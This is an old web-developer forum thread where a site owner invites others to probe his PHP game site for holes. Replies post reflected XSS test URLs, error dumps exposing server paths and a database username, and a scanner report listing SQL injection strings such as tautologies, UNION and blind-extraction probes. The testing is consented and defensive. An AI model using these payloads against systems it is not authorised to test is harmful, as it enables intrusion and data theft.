darkfreaks Posted December 26, 2008 Share Posted December 26, 2008 Test this site for security Holes i will list what i have patched and what programs i used to patch them http://www.kaboochie.com/index.php SQL Inject me: 0 Failures Tested on: Report.php,contact_us.php,update_profile.php Link to comment https://forums.phpfreaks.com/topic/138421-solved-security-test-please/ Share on other sites More sharing options...
darkfreaks Posted December 26, 2008 Author Share Posted December 26, 2008 ok Patched login.php SQL Inject me: 0 Failures Tested on: Report.php,contact_us.php,update_profile.php,login.php Link to comment https://forums.phpfreaks.com/topic/138421-solved-security-test-please/#findComment-723745 Share on other sites More sharing options...
darkfreaks Posted December 26, 2008 Author Share Posted December 26, 2008 Fixed Html main page to fit HTML Transitional Doc type W3C Validator: Your page is W3c Valid!!! Link to comment https://forums.phpfreaks.com/topic/138421-solved-security-test-please/#findComment-723782 Share on other sites More sharing options...
Coreye Posted December 26, 2008 Share Posted December 26, 2008 Cross Site Scripting(XSS): http://www.kaboochie.com/login.php?game=1&error="><marquee><h1>test Cross Site Scripting(XSS): http://www.kaboochie.com/shops.php?game=1&error="><marquee><h1>test Full Path Disclosure On Submit: http://www.kaboochie.com/lost_pass.php Fatal error: Cannot redeclare clean_post_var() (previously declared in /home/kabooc/public_html/func.lib.php:271) in /home/kabooc/public_html/lost_pass.pro.php on line 27 Full path Disclosure: http://www.kaboochie.com/prompt.pro.php Parse error: syntax error, unexpected ';' in /home/kabooc/public_html/prompt.pro.php on line 36 Full Path Disclosure: http://www.kaboochie.com/search.php Fatal error: Cannot redeclare clean_post_var() (previously declared in /home/kabooc/public_html/func.lib.php:271) in /home/kabooc/public_html/search.php on line 23 Full Path Disclosure: http://www.kaboochie.com/login.pro.php Fatal error: Call to undefined function: clean_post_vars() in /home/kabooc/public_html/login.pro.php on line 10 Full Path Disclosure: http://www.kaboochie.com/feedback.php Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: Access denied for user 'kabooc'@'localhost' (using password: NO) in /home/kabooc/public_html/feedback.php on line 87 Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: A link to the server could not be established in /home/kabooc/public_html/feedback.php on line 87 Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: Access denied for user 'kabooc'@'localhost' (using password: NO) in /home/kabooc/public_html/feedback.php on line 87 Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: A link to the server could not be established in /home/kabooc/public_html/feedback.php on line 87 Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: Access denied for user 'kabooc'@'localhost' (using password: NO) in /home/kabooc/public_html/feedback.php on line 87 Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: A link to the server could not be established in /home/kabooc/public_html/feedback.php on line 87 Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: Access denied for user 'kabooc'@'localhost' (using password: NO) in /home/kabooc/public_html/feedback.php on line 87 Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: A link to the server could not be established in /home/kabooc/public_html/feedback.php on line 87 Warning: Cannot modify header information - headers already sent by (output started at /home/kabooc/public_html/feedback.php:87) in /home/kabooc/public_html/feedback.php on line 109 Link to comment https://forums.phpfreaks.com/topic/138421-solved-security-test-please/#findComment-723786 Share on other sites More sharing options...
darkfreaks Posted December 26, 2008 Author Share Posted December 26, 2008 i wil fix the XSS full path disclosure im not too worried about Fixed: login.php disclosure,lost_pass.php disclosure Link to comment https://forums.phpfreaks.com/topic/138421-solved-security-test-please/#findComment-723791 Share on other sites More sharing options...
darkfreaks Posted December 26, 2008 Author Share Posted December 26, 2008 this is getting on my nerves i had to switch back for now until i can think of a better way for the disclosure. :-\ Link to comment https://forums.phpfreaks.com/topic/138421-solved-security-test-please/#findComment-723796 Share on other sites More sharing options...
om Posted December 26, 2008 Share Posted December 26, 2008 Test this site for security Holes i will list what i have patched and what programs i used to patch them http://www.kaboochie.com/index.php SQL Inject me: 0 Failures Tested on: Report.php,contact_us.php,update_profile.php R u handling this site alone????????? what is the team size here 34 failures of register page http://www.kaboochie.com/register.php SQL Injection String Tests Summary (219300 results recorded) Failures: 34 Warnings: 0 Passes: 219266 SQL Injection String Test Results command Submitted Form State: * submit: ++Search Users/Pets Results: Server Status Code: 302 OK Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE Server Status Code: 302 OK Tested value: 1' OR '1'='1 Server Status Code: 302 OK Tested value: 1' OR '1'='1 Server Status Code: 302 OK Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' -- Server Status Code: 302 OK Tested value: 1'1 Server Status Code: 302 OK Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31 Server Status Code: 302 OK Tested value: '; DESC users; -- Server Status Code: 302 OK Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116 Server Status Code: 302 OK Tested value: ' OR username IS NOT NULL OR username = ' Server Status Code: 302 OK Tested value: 1' AND non_existant_table = '1 Server Status Code: 302 OK Tested value: 1 AND USER_NAME() = 'dbo' Server Status Code: 302 OK Tested value: 1'1 Server Status Code: 302 OK Tested value: 1' OR '1'='1 Server Status Code: 302 OK Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- Server Status Code: 302 OK Tested value: 1 AND 1=1 Server Status Code: 302 OK Tested value: 1 EXEC XP_ Server Status Code: 302 OK Tested value: 1 OR 1=1 This field passed 14603 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. submit Submitted Form State: * command: ++ Results: Server Status Code: 302 OK Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31 Server Status Code: 302 OK Tested value: 1' OR '1'='1 Server Status Code: 302 OK Tested value: 1' OR '1'='1 Server Status Code: 302 OK Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE Server Status Code: 302 OK Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' -- Server Status Code: 302 OK Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116 Server Status Code: 302 OK Tested value: ' OR username IS NOT NULL OR username = ' Server Status Code: 302 OK Tested value: 1' AND non_existant_table = '1 Server Status Code: 302 OK Tested value: 1'1 Server Status Code: 302 OK Tested value: '; DESC users; -- Server Status Code: 302 OK Tested value: 1 AND USER_NAME() = 'dbo' Server Status Code: 302 OK Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- Server Status Code: 302 OK Tested value: 1 AND 1=1 Server Status Code: 302 OK Tested value: 1 EXEC XP_ Server Status Code: 302 OK Tested value: 1'1 Server Status Code: 302 OK Tested value: 1' OR '1'='1 Server Status Code: 302 OK Tested value: 1 OR 1=1 This field passed 14603 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. reg_username Submitted Form State: * reg_display_name: ++ * referer: ++ * reg_full_name: ++ * reg_email: ++ * reg_location: ++ * reg_day: ++ * reg_month: ++ * reg_year: ++ * reg_gender: ++1 * reg_sig: ++ * reg_profile: ++ * Submit: ++Register My Account Now!!! Results: This field passed 14620 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. reg_display_name Submitted Form State: * reg_username: ++88888_____ * referer: ++ * reg_full_name: ++ * reg_email: ++ * reg_location: ++ * reg_day: ++ * reg_month: ++ * reg_year: ++ * reg_gender: ++1 * reg_sig: ++ * reg_profile: ++ * Submit: ++Register My Account Now!!! Results: This field passed 14620 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. referer Submitted Form State: * reg_username: ++88888_____ * reg_display_name: ++ * reg_full_name: ++ * reg_email: ++ * reg_location: ++ * reg_day: ++ * reg_month: ++ * reg_year: ++ * reg_gender: ++1 * reg_sig: ++ * reg_profile: ++ * Submit: ++Register My Account Now!!! Results: This field passed 14620 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. reg_full_name Submitted Form State: * reg_username: ++88888_____ * reg_display_name: ++ * referer: ++ * reg_email: ++ * reg_location: ++ * reg_day: ++ * reg_month: ++ * reg_year: ++ * reg_gender: ++1 * reg_sig: ++ * reg_profile: ++ * Submit: ++Register My Account Now!!! Results: This field passed 14620 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. reg_email Submitted Form State: * reg_username: ++88888_____ * reg_display_name: ++ * referer: ++ * reg_full_name: ++ * reg_location: ++ * reg_day: ++ * reg_month: ++ * reg_year: ++ * reg_gender: ++1 * reg_sig: ++ * reg_profile: ++ * Submit: ++Register My Account Now!!! Results: This field passed 14620 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. reg_location Submitted Form State: * reg_username: ++88888_____ * reg_display_name: ++ * referer: ++ * reg_full_name: ++ * reg_email: ++ * reg_day: ++ * reg_month: ++ * reg_year: ++ * reg_gender: ++1 * reg_sig: ++ * reg_profile: ++ * Submit: ++Register My Account Now!!! Results: This field passed 14620 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. reg_day Submitted Form State: * reg_username: ++88888_____ * reg_display_name: ++ * referer: ++ * reg_full_name: ++ * reg_email: ++ * reg_location: ++ * reg_month: ++ * reg_year: ++ * reg_gender: ++1 * reg_sig: ++ * reg_profile: ++ * Submit: ++Register My Account Now!!! Results: This field passed 14620 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. reg_month Submitted Form State: * reg_username: ++88888_____ * reg_display_name: ++ * referer: ++ * reg_full_name: ++ * reg_email: ++ * reg_location: ++ * reg_day: ++ * reg_year: ++ * reg_gender: ++1 * reg_sig: ++ * reg_profile: ++ * Submit: ++Register My Account Now!!! Results: This field passed 14620 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. reg_year Submitted Form State: * reg_username: ++88888_____ * reg_display_name: ++ * referer: ++ * reg_full_name: ++ * reg_email: ++ * reg_location: ++ * reg_day: ++ * reg_month: ++ * reg_gender: ++1 * reg_sig: ++ * reg_profile: ++ * Submit: ++Register My Account Now!!! Results: This field passed 14620 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. reg_gender Submitted Form State: * reg_username: ++88888_____ * reg_display_name: ++ * referer: ++ * reg_full_name: ++ * reg_email: ++ * reg_location: ++ * reg_day: ++ * reg_month: ++ * reg_year: ++ * reg_sig: ++ * reg_profile: ++ * Submit: ++Register My Account Now!!! Results: This field passed 14620 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. reg_sig Submitted Form State: * reg_username: ++88888_____ * reg_display_name: ++ * referer: ++ * reg_full_name: ++ * reg_email: ++ * reg_location: ++ * reg_day: ++ * reg_month: ++ * reg_year: ++ * reg_gender: ++1 * reg_profile: ++ * Submit: ++Register My Account Now!!! Results: This field passed 14620 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. reg_profile Submitted Form State: * reg_username: ++88888_____ * reg_display_name: ++ * referer: ++ * reg_full_name: ++ * reg_email: ++ * reg_location: ++ * reg_day: ++ * reg_month: ++ * reg_year: ++ * reg_gender: ++1 * reg_sig: ++ * Submit: ++Register My Account Now!!! Results: This field passed 14620 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. Submit Submitted Form State: * reg_username: ++88888_____ * reg_display_name: ++ * referer: ++ * reg_full_name: ++ * reg_email: ++ * reg_location: ++ * reg_day: ++ * reg_month: ++ * reg_year: ++ * reg_gender: ++1 * reg_sig: ++ * reg_profile: ++ Results: This field passed 14620 tests. To see all the passed results, go to Tools->SQL Inject Me->Options and click 'Show passed results in final report' and rerun this test. Results genenerated on December 27, 2008 for http://www.kaboochie.com/register.php Link to comment https://forums.phpfreaks.com/topic/138421-solved-security-test-please/#findComment-724104 Share on other sites More sharing options...
darkfreaks Posted December 26, 2008 Author Share Posted December 26, 2008 yeah i know i re uploaded everything. the whole script uses global s and i am going to have to go back and get rid of them and put it back together without them. this is now solved. Link to comment https://forums.phpfreaks.com/topic/138421-solved-security-test-please/#findComment-724121 Share on other sites More sharing options...
Recommended Posts